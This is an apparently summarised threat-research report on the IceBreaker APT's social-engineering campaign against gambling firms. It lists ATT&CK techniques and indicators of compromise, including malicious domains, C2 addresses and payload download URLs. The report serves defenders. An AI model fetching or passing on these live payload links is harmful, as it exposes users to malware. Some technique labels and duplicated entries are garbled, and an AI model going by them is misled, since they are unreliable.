Threat Research

Operation Ice Breaker Targets The Gam(bl)ing Industry Right Before It’s Biggest Gathering

Securonix

IceBreaker APT is a newly tracked threat targeting the gambling/gaming sector in the run-up to ICE London, employing social-engineering to lure a customer-service agent and delivering a two-stage payload chain. Researchers describe a modular Node.js-based backdoor (IceBreaker Backdoor) with Houdini RAT as a second-stage, plus a range of IOCs, TTPs, and Yara rules, all associated with IceBreaker activity.
#IceBreaker #IceBreakerBackdoor

Keypoints

  • IceBreaker APT is a newly tracked actor targeting the gaming/gambling industry around ICE London.
  • Initial access relies on social engineering via a customer-service scenario, with attackers pretending to have login/registration issues.
  • The intrusion uses a two-stage delivery: a malicious LNK/VBS downloader presented during a chat conversation, leading to MSI/VBS payloads.
  • First stage LNK downloads an MSI that drops an IceBreaker Backdoor, or a VBS downloader that retrieves Houdini RAT.
  • The second stage includes a modular IceBreaker Backdoor written in Node.js, with features like process discovery, credential access, and a Socks5 proxy, plus a Houdini RAT variant.
  • Several IOCs and Yara rules are provided to help defenders detect IceBreaker activity, including deceptive domains and C2 infrastructure.

MITRE Techniques

  • [T1566.003] Spearphishing via Service – The attacker “pretend[s] to be a customer of the website with an issue” to initiate contact and deliver malicious content. [The Modus Operadi of the attacker is to pretend to be a customer of the website with an issue, this should be the first indicator that something is not right.]
  • [T1204.001] Malicious Link – The attacker distributes LNK/VBS content with links to download malicious content, masquerading as a screenshot tool. [The attacker is distributing LNK files via a set of domain names that mimic the legitimate domain “screenshot[.]net” … download the allegedly “screenshot”.]
  • [T1059.003] JavaScript – The second-stage backdoor embeds Node.js components and is executed as JavaScript-based logic. [the Node.js compiled binaries (.jsc) which are embedded in the malware executable and are being decoded at run-time. … Bytenode.]
  • [T1059.005] Visual Basic – The VBS downloader uses a Visual Basic Script with deception tricks. [The received file is a Visual Basic Script which has some tricks to deceive researchers during the analysis.]
  • [T1218.007] Msiexec – The LNK download chain abuses msiexec.exe to fetch and install an MSI payload. [downloads an additional MSI payload from its C2 server by abusing the trusted Windows binary msiexec.exe.]
  • [T1547.001] Boot or Logon Autostart Execution – Persistence via startup folder LNK file WINN.lnk. [Persistence is achieved by creating a new LNK file in the startup folder “MicrosoftWindowsStart MenuProgramsStartupWINN.lnk”.]
  • [T1036] Masquerading – The MSI package is crafted to appear as legitimate software. [The installer … pretending to be a legitimate software installer. … Avast Free Antivirus and Formware 3D were impersonated.]
  • [T1087.001] Local Account Discovery – Local account discovery during intrusions. [Local Account]
  • [T1057] Process Discovery – Discovery of running processes on the system. [Process Discovery]
  • [T1082] System Information Discovery – Gather system information. [System Information Discovery]
  • [T1113] Screen Capture – Capturing screenshots from the victim machine. [Screen Capture]
  • [T1572] Protocol Tunneling – Exfiltration/C2 over a tunneling protocol. [Protocol Tunneling]
  • [T1071.001] Web Protocols – C2 communications over web protocols. [Web Protocols]
  • [T1105] Ingress Tool Transfer – Downloading and delivering tools/assets from C2. [Ingress Tool Transfer]
  • [T1555.003] Credentials from Web Browsers – Stolen browser credentials/cookies. [Credentials from Web Browsers]
  • [T1539] Steal Web Session Cookies – Accessing web session cookies. [Steal Web Session Cookie]
  • [T1518] Software Discovery – Discovery of installed software. [Software Discovery]
  • [T1087.001] Local Account – Local account discovery (repeat listing for emphasis).
  • [T1571] Non-Standard Port – C2 uses non-standard port for command and control. [Non-Standard Port]
  • [T1105] Ingress Tool Transfer – See above (重复项).
  • [T1041] Exfiltration Over C2 Channel – Exfiltration over C2 channel via WebSockets. [Exfiltrate files to the remote server via web sockets.]

Indicators of Compromise

  • [Domains] IceBreaker distribution network domains – screenshotcap[.]com, screenshotlite[.]com, and 3 more domains
  • [IP] Command-and-control and distribution addresses – 178[.]63[.]65[.]51, 194[.]5[.]97[.]17
  • [Hashes] MSI payloads and backdoor files – c97293c4d10331f9bc47b041c8ce4e0e (MD5) and 978940d9785d3ade9f1c9b13ce35d67af2f47091740c2a4a5978e512543e6d76 (SHA256)
  • [Files] LNK and VBS delivery artifacts – WINN.lnk, Capimg.zip, Capimg.zip contents (Port.exe within MSI)
  • [URLs] Delivery/download URLs observed – hxxps://down.xn--screnshot-iib[.]net/92713 (LNK MSI delivery), https://www.dropbox[.]com/s/kb79h6dqgx78wm2/Capimg.zip?dl=1
  • [Domains/Resources] Screenshot-based impersonation infrastructure – screenshotcap[.]com, screenshotlite[.]com, and 2 more domains

Read more: https://www.securityjoes.com/post/operation-ice-breaker-targets-the-gam-bl-ing-industry-right-before-it-s-biggest-gathering